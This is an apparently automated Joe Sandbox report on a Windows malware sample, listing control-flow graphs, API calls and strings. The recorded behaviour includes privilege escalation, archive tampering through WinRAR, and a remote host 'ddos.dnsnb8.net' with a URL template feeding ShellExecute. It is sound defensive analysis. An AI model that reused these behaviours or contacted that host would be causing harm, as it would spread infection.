                                                                                                                                                                                                                          control_flow_graph 377 612c48-612c75 memset call 611973 380 612cb2-612cb9 377->380 381 612c77-612c7f 377->381 384 612cc8-612ccc 380->384 385 612cbb-612cc2 VirtualFree 380->385 382 612c81-612c8b 381->382 383 612c8f-612cac CreateThread WaitForMultipleObjects 381->383 382->383 383->380 385->384
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00612C57
                                                                                                                                                                                                                            • Part of subcall function 00611973: PathFileExistsA.SHLWAPI(\Na`Na,00000000,C:\Users\user\AppData\Local\Temp\XBVdJN.exe), ref: 00611992
                                                                                                                                                                                                                            • Part of subcall function 00611973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 006119BA
                                                                                                                                                                                                                            • Part of subcall function 00611973: Sleep.KERNEL32(00000064), ref: 006119C6
                                                                                                                                                                                                                            • Part of subcall function 00611973: wsprintfA.USER32 ref: 006119EC
                                                                                                                                                                                                                            • Part of subcall function 00611973: CopyFileA.KERNEL32(?,?,00000000), ref: 00611A00
                                                                                                                                                                                                                            • Part of subcall function 00611973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00611A1E
                                                                                                                                                                                                                            • Part of subcall function 00611973: GetFileSize.KERNEL32(?,00000000), ref: 00611A2C
                                                                                                                                                                                                                            • Part of subcall function 00611973: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00611A46
                                                                                                                                                                                                                            • Part of subcall function 00611973: ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 00611A65
                                                                                                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,00612B8C,00000000,00000000,00000000), ref: 00612C99
                                                                                                                                                                                                                          • WaitForMultipleObjects.KERNEL32(00000001,006116BA,00000001,000000FF,?,006116BA,00000000), ref: 00612CAC
                                                                                                                                                                                                                          • VirtualFree.KERNEL32(01070000,00000000,00008000,C:\Users\user\AppData\Local\Temp\XBVdJN.exe,00614E5C,00614E60,?,006116BA,00000000), ref: 00612CC2
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\XBVdJN.exe, xrefs: 00612C69
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.2443066507.0000000000611000.00000020.00000001.01000000.00000004.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443048248.0000000000610000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443084694.0000000000613000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443101466.0000000000614000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443115264.0000000000616000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_610000_XBVdJN.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: File$Create$Virtual$AllocCopyExistsFreeMultipleObjectsPathReadSizeSleepThreadWaitmemsetwsprintf
                                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\XBVdJN.exe
                                                                                                                                                                                                                          • API String ID: 2042498389-1113178309
                                                                                                                                                                                                                          • Opcode ID: 56fa2a4f66104d298270385df844c5d1f88bb007cc831c8059d5b28338dbec65
                                                                                                                                                                                                                          • Instruction ID: e32badba721ac0a266cbaf12613a00ea936d93f0ddaab6ea5afafd462113c682
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 56fa2a4f66104d298270385df844c5d1f88bb007cc831c8059d5b28338dbec65
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DF01D4716412217BD75097949C1AEDF7FAEEF01B60F088115B605DA2C1D9A09990C7E0

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 386 6114e1-6114fb 387 611541-611547 386->387 388 6114fd-611510 GetModuleHandleA 386->388 391 611573-611574 call 611638 387->391 392 611549-61154c 387->392 389 611512-611518 388->389 390 61151a-611535 VirtualQuery 388->390 389->387 393 611537-611539 390->393 394 61153b 390->394 399 611579-61157a ExitProcess 391->399 395 611569-611570 392->395 396 61154e-611555 392->396 393->387 393->394 394->387 396->395 398 611557-611566 call 611af9 396->398 398->395
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 00611504
                                                                                                                                                                                                                          • VirtualQuery.KERNEL32(006114E1,?,0000001C), ref: 00611525
                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 0061157A
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.2443066507.0000000000611000.00000020.00000001.01000000.00000004.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443048248.0000000000610000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443084694.0000000000613000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443101466.0000000000614000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443115264.0000000000616000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_610000_XBVdJN.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ExitHandleModuleProcessQueryVirtual
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3946701194-0
                                                                                                                                                                                                                          • Opcode ID: 45bc568c5c4ad3140564c360a3f50f2ba585b756154b6dfa8a05430d767da7da
                                                                                                                                                                                                                          • Instruction ID: a2fd11c28bec24ae4142ac9c0612d3fd795b0936b92c25b69937af3d7d429ef1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 45bc568c5c4ad3140564c360a3f50f2ba585b756154b6dfa8a05430d767da7da
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 36115EB1D01215DFCF10DFA5B8856FD77BBEB85711B18A02BF602DB250E6348981EB50

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 402 611915-611922 403 611924-611926 402->403 404 611928-61192c 402->404 405 61196e-611970 403->405 406 61194f-611952 404->406 407 61192e-61194d memset GetFileTime 404->407 406->405 409 611954-611960 SetFileTime 406->409 408 611966-611968 407->408 410 61196a 408->410 411 61196c 408->411 409->408 410->411 411->405
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.2443066507.0000000000611000.00000020.00000001.01000000.00000004.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443048248.0000000000610000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443084694.0000000000613000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443101466.0000000000614000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443115264.0000000000616000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_610000_XBVdJN.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileTimememset
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 176422537-0
                                                                                                                                                                                                                          • Opcode ID: 323f1d4380aa0f9c77b46b170d48acb819f83beca1e49e3ab9416b907dd605e7
                                                                                                                                                                                                                          • Instruction ID: 6573639a602018b0c992fb00b018dde77bb7bfe688e7d3fb707ba593f18ce745
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 323f1d4380aa0f9c77b46b170d48acb819f83beca1e49e3ab9416b907dd605e7
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BDF04432200219ABDB209E26DC04AE777EEAB55361F08893AF626D9150E730D685CBF0

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 412 616159-616189 VirtualFree 413 61618c-616192 412->413 414 6160c7-6160cf 413->414 415 616198-6161b0 VirtualFree 413->415 414->413 418 6160d5-6160f8 VirtualAlloc 414->418 416 6161b2-6161b4 415->416 417 6161ba-6161c8 415->417 416->417 419 616243-616251 417->419 420 6161ca-6161d7 417->420 435 6160fa-6160fc call 6166c8 418->435 436 6160fe-616106 418->436 422 616253 419->422 423 616264-61626f 419->423 424 6161dd-6161e0 420->424 427 616255-616258 422->427 428 616271-616276 423->428 424->419 429 6161e2-6161f2 424->429 427->423 431 61625a-616262 427->431 432 616389-6163b1 VirtualProtect 428->432 433 61627c-616289 428->433 434 6161f5-6161fe 429->434 431->427 439 6163b7-6163ba 432->439 454 616292-616298 433->454 455 61628b 433->455 437 616200-616203 434->437 438 61620c-616219 434->438 435->436 441 616155-616189 VirtualFree 436->441 442 616108-61611d 436->442 444 616205-616208 437->444 445 61621b-616228 437->445 446 616238-61623f 438->446 447 6163fc-6163ff VirtualProtect 439->447 448 6163bc-6163c2 439->448 441->413 452 61611f-616121 442->452 456 61622a-616236 444->456 457 61620a 444->457 445->446 446->434 451 616241 446->451 453 616400-616416 447->453 448->448 449 6163c4 448->449 449->447 458 6163c6-6163cf 449->458 451->424 459 616151-616154 452->459 460 616123 452->460 461 616420-616425 453->461 462 616418-61641d 453->462 463 6162a2-6162ac 454->463 455->454 456->446 457->446 464 6163d1 458->464 465 6163d4-6163d8 458->465 459->441 460->459 466 616125-616128 460->466 467 6162b1-6162c8 463->467 468 6162ae 463->468 464->465 471 6163da 465->471 472 6163dd-6163e1 465->472 473 616134-61613b 466->473 474 61612a-61612e 466->474 469 616373-616384 467->469 470 6162ce-6162d4 467->470 468->467 469->428 475 6162d6-6162d9 470->475 476 6162da-6162f1 470->476 471->472 477 6163e3 472->477 478 6163e7-6163fa VirtualProtect 472->478 481 616130-616132 473->481 482 61613d-61614f 473->482 474->473 474->481 475->476 484 6162f3-6162f9 476->484 485 616365-61636e 476->485 477->478 478->439 478->447 481->452 482->452 486 616314-616326 484->486 487 6162fb-61630f 484->487 485->463 489 616328-61634a 486->489 490 61634c-616360 486->490 488 616426-6164a9 487->488 499 616519-61651c 488->499 500 6164ab-6164c0 488->500 489->485 490->488 501 616583-616587 499->501 502 61651d-61651e 499->502 506 6164c2 500->506 507 616535-616537 500->507 504 616588-61658b 501->504 505 616522-616533 502->505 508 6165a1-6165a3 504->508 509 61658d-61658f 504->509 505->507 512 6164c5-6164cd 506->512 513 6164f8 506->513 510 616539 507->510 511 61659a 507->511 516 616591-616593 509->516 517 6165b4 510->517 518 61653b-616541 510->518 519 61659b-61659d 511->519 520 616542-616545 512->520 521 6164cf-6164d4 512->521 514 6164fa-6164fe 513->514 515 61656c-61656f 513->515 527 616500 514->527 528 616572 514->528 515->528 516->519 529 616595 516->529 526 6165be-6165db 517->526 518->520 519->516 522 61659f 519->522 523 61654d-616550 520->523 524 616517-616518 521->524 525 6164d6-6164d9 521->525 522->504 523->526 530 616552-616556 523->530 524->499 525->523 531 6164db-6164f5 525->531 537 6165dd-6165f6 526->537 527->505 533 616502 527->533 534 616573-616576 528->534 529->511 535 616578-61657a 530->535 536 616558-616569 530->536 531->513 533->534 538 616504-616513 533->538 534->535 535->537 540 61657c 535->540 536->515 539 6165f7-616608 537->539 538->507 541 616515 538->541 540->539 542 61657e-61657f 540->542 541->524 542->501
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?), ref: 006160DF
                                                                                                                                                                                                                          • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 00616189
                                                                                                                                                                                                                          • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 006161A5
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.2443115264.0000000000616000.00000040.00000001.01000000.00000004.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443048248.0000000000610000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443066507.0000000000611000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443084694.0000000000613000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443101466.0000000000614000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_610000_XBVdJN.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Virtual$Free$Alloc
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1852963964-0
                                                                                                                                                                                                                          • Opcode ID: 0411772ceab8fe8f8ab4a950da42e3b69506bef7116778690682dc8f4b0badf0
                                                                                                                                                                                                                          • Instruction ID: adc04cc6d33c43536ef332b608608e42f24798f864050a2dde2602ff0fc239ea
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0411772ceab8fe8f8ab4a950da42e3b69506bef7116778690682dc8f4b0badf0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3E118F76A00649CFCF318E58CC817DD37A2FF04301F6D4528EE499B391DAB16A81CB94
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\XBVdJN.exe,?,?,?,?,?,?,006113EF), ref: 006111AB
                                                                                                                                                                                                                          • OpenProcessToken.ADVAPI32(00000000,00000028,006113EF,?,?,?,?,?,?,006113EF), ref: 006111BB
                                                                                                                                                                                                                          • AdjustTokenPrivileges.ADVAPI32(006113EF,00000000,?,00000010,00000000,00000000), ref: 006111EB
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(006113EF), ref: 006111FA
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,006113EF), ref: 00611203
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\XBVdJN.exe, xrefs: 006111A5
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.2443066507.0000000000611000.00000020.00000001.01000000.00000004.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443048248.0000000000610000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443084694.0000000000613000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443101466.0000000000614000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443115264.0000000000616000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_610000_XBVdJN.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseHandleProcessToken$AdjustCurrentOpenPrivileges
                                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\XBVdJN.exe
                                                                                                                                                                                                                          • API String ID: 75692138-1113178309
                                                                                                                                                                                                                          • Opcode ID: 4e08de804a504ec6e4adaebbb4d77f36efdaad3e51f9830d01aa999529719246
                                                                                                                                                                                                                          • Instruction ID: 6f18135594e1f7a0df20ab76b18cc6bb71d03768579fc764d29619b51f6aa1a3
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4e08de804a504ec6e4adaebbb4d77f36efdaad3e51f9830d01aa999529719246
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0101D675900219EFDB00DFD4C989AEEBBBAFB08345F14856AE606E2250D7715F849B50
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\XBVdJN.exe), ref: 006113BC
                                                                                                                                                                                                                          • LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 006113DA
                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 00611448
                                                                                                                                                                                                                            • Part of subcall function 0061119F: GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\XBVdJN.exe,?,?,?,?,?,?,006113EF), ref: 006111AB
                                                                                                                                                                                                                            • Part of subcall function 0061119F: OpenProcessToken.ADVAPI32(00000000,00000028,006113EF,?,?,?,?,?,?,006113EF), ref: 006111BB
                                                                                                                                                                                                                            • Part of subcall function 0061119F: AdjustTokenPrivileges.ADVAPI32(006113EF,00000000,?,00000010,00000000,00000000), ref: 006111EB
                                                                                                                                                                                                                            • Part of subcall function 0061119F: CloseHandle.KERNEL32(006113EF), ref: 006111FA
                                                                                                                                                                                                                            • Part of subcall function 0061119F: CloseHandle.KERNEL32(?,?,?,?,?,?,?,006113EF), ref: 00611203
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • SeDebugPrivilege, xrefs: 006113D3
                                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\XBVdJN.exe, xrefs: 006113A8
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.2443066507.0000000000611000.00000020.00000001.01000000.00000004.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443048248.0000000000610000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443084694.0000000000613000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443101466.0000000000614000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443115264.0000000000616000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_610000_XBVdJN.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Process$CloseCurrentHandleToken$AdjustLookupOpenPrivilegePrivilegesValueVersion
                                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\XBVdJN.exe$SeDebugPrivilege
                                                                                                                                                                                                                          • API String ID: 4123949106-3984717035
                                                                                                                                                                                                                          • Opcode ID: 3ea71794a4073d5d2f578111ba73d48459f3c044b78bf94c9b870b004008e6ef
                                                                                                                                                                                                                          • Instruction ID: c966b6fd8088b1b5583bffa806a919246786e2cd91d8e1efbb9f7041a00d03b2
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3ea71794a4073d5d2f578111ba73d48459f3c044b78bf94c9b870b004008e6ef
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DD31A471D00219EADF20DBA5CC45FEEBBBAEB46704F14406AE714FA241D7309E85CB60
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • strstr.MSVCRT ref: 006123CC
                                                                                                                                                                                                                          • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00612464
                                                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 00612472
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,00000000,00000000), ref: 006124A8
                                                                                                                                                                                                                          • memset.MSVCRT ref: 006124B9
                                                                                                                                                                                                                          • strrchr.MSVCRT ref: 006124C9
                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 006124DE
                                                                                                                                                                                                                          • strrchr.MSVCRT ref: 006124ED
                                                                                                                                                                                                                          • memset.MSVCRT ref: 006124F2
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00612505
                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 00612524
                                                                                                                                                                                                                          • Sleep.KERNEL32(000007D0), ref: 00612535
                                                                                                                                                                                                                          • Sleep.KERNEL32(000007D0), ref: 0061255D
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0061256E
                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 00612585
                                                                                                                                                                                                                          • memset.MSVCRT ref: 006125A6
                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 006125CA
                                                                                                                                                                                                                          • Sleep.KERNEL32(000007D0), ref: 006125D0
                                                                                                                                                                                                                          • Sleep.KERNEL32(000007D0,?,?), ref: 006125E5
                                                                                                                                                                                                                          • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 006125FC
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,00000000,00000001), ref: 00612611
                                                                                                                                                                                                                          • SetFilePointer.KERNEL32(FFFFFFFF,?,00000000,00000000), ref: 00612642
                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,00000006,?,00000000), ref: 0061265B
                                                                                                                                                                                                                          • SetEndOfFile.KERNEL32 ref: 0061266D
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00612676
                                                                                                                                                                                                                          • RemoveDirectoryA.KERNEL32(?), ref: 00612681
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.2443066507.0000000000611000.00000020.00000001.01000000.00000004.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443048248.0000000000610000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443084694.0000000000613000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443101466.0000000000614000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443115264.0000000000616000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_610000_XBVdJN.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: File$memset$Sleepwsprintf$CloseHandle$Createstrrchr$DirectoryPointerRemoveSizeWritestrstr
                                                                                                                                                                                                                          • String ID: %s M %s -r -o+ -ep1 "%s" "%s\*"$%s X -ibck "%s" "%s\"$%s%s$%s\$-ibck$C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                                          • API String ID: 2203340711-774930870
                                                                                                                                                                                                                          • Opcode ID: e5833b98aa60d7829c58d26d02b4704d7dffe51190f0019bc68034e01adacbcd
                                                                                                                                                                                                                          • Instruction ID: d29305a30d1c4d73ae4f2543459749953b0431b80296214518ce14a78aefcb7c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e5833b98aa60d7829c58d26d02b4704d7dffe51190f0019bc68034e01adacbcd
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5981EFB1504305ABD710DF60DC48EEBBBEEFB88705F08491AF645D2290D7709A898BA6
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00612766
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00612774
                                                                                                                                                                                                                          • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000026,00000000), ref: 00612787
                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 006127AB
                                                                                                                                                                                                                            • Part of subcall function 0061185B: GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,76938400,http://%s:%d/%s/%s,?,?,?,00611118), ref: 00611867
                                                                                                                                                                                                                            • Part of subcall function 0061185B: srand.MSVCRT ref: 00611878
                                                                                                                                                                                                                            • Part of subcall function 0061185B: rand.MSVCRT ref: 00611880
                                                                                                                                                                                                                            • Part of subcall function 0061185B: srand.MSVCRT ref: 00611890
                                                                                                                                                                                                                            • Part of subcall function 0061185B: rand.MSVCRT ref: 00611894
                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 006127C6
                                                                                                                                                                                                                          • CopyFileA.KERNEL32(?,00614C80,00000000), ref: 006127D4
                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 006127F4
                                                                                                                                                                                                                            • Part of subcall function 00611973: PathFileExistsA.SHLWAPI(\Na`Na,00000000,C:\Users\user\AppData\Local\Temp\XBVdJN.exe), ref: 00611992
                                                                                                                                                                                                                            • Part of subcall function 00611973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 006119BA
                                                                                                                                                                                                                            • Part of subcall function 00611973: Sleep.KERNEL32(00000064), ref: 006119C6
                                                                                                                                                                                                                            • Part of subcall function 00611973: wsprintfA.USER32 ref: 006119EC
                                                                                                                                                                                                                            • Part of subcall function 00611973: CopyFileA.KERNEL32(?,?,00000000), ref: 00611A00
                                                                                                                                                                                                                            • Part of subcall function 00611973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00611A1E
                                                                                                                                                                                                                            • Part of subcall function 00611973: GetFileSize.KERNEL32(?,00000000), ref: 00611A2C
                                                                                                                                                                                                                            • Part of subcall function 00611973: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00611A46
                                                                                                                                                                                                                            • Part of subcall function 00611973: ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 00611A65
                                                                                                                                                                                                                          • DeleteFileA.KERNEL32(?,?,00614E54,00614E58), ref: 0061281A
                                                                                                                                                                                                                          • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000000,00000000,?,00614E54,00614E58), ref: 00612832
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.2443066507.0000000000611000.00000020.00000001.01000000.00000004.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443048248.0000000000610000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443084694.0000000000613000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443101466.0000000000614000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2443115264.0000000000616000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_610000_XBVdJN.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: File$wsprintf$Create$CopyPathTimememsetrandsrand$AllocDeleteExistsFolderReadSizeSleepSpecialSystemVirtual
                                                                                                                                                                                                                          • String ID: %s%.8x.exe$%s%s$%s\%s$C:\Users\user\AppData\Local\Temp\$C:\Windows\system32$\WinRAR\Rar.exe$c_31892.nls
                                                                                                                                                                                                                          • API String ID: 692489704-3099098879
                                                                                                                                                                                                                          • Opcode ID: 15e9dd4a0b9731c3da93ed45c0e02bc8acf8e0dc5e159c636082fd85638452fd
                                                                                                                                                                                                                          • Instruction ID: 99ddcd6f3c82f4a4693d06aa8e122afffab516f0324024e02aaa2eb2293fad81
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 15e9dd4a0b9731c3da93ed45c0e02bc8acf8e0dc5e159c636082fd85638452fd
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1521A7F694022C7BDB10EBA49C89FDB77AEDB04745F0944A2B605E3141E670DFC48AA0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0061185B: GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,76938400,http://%s:%d/%s/%s,?,?,?,00611118), ref: 00611867
                                                                                                                                                                                                                            • Part of subcall function 0061185B: srand.MSVCRT ref: 00611878
                                                                                                                                                                                                                            • Part of subcall function 0061185B: rand.MSVCRT ref: 00611880
                                                                                                                                                                                                                            • Part of subcall function 0061185B: srand.MSVCRT ref: 00611890
                                                                                                                                                                                                                            • Part of subcall function 0061185B: rand.MSVCRT ref: 00611894
                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 006115AA
                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 006115C6
                                                                                                                                                                                                                          • lstrlen.KERNEL32(?), ref: 006115D2
                                                                                                                                                                                                                          • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000000,00000000), ref: 006115EE
                                                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,?,00000000,00000001,00000000), ref: 00611609
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00611612
                                                                                                                                                                                                                          • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 0061162D
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
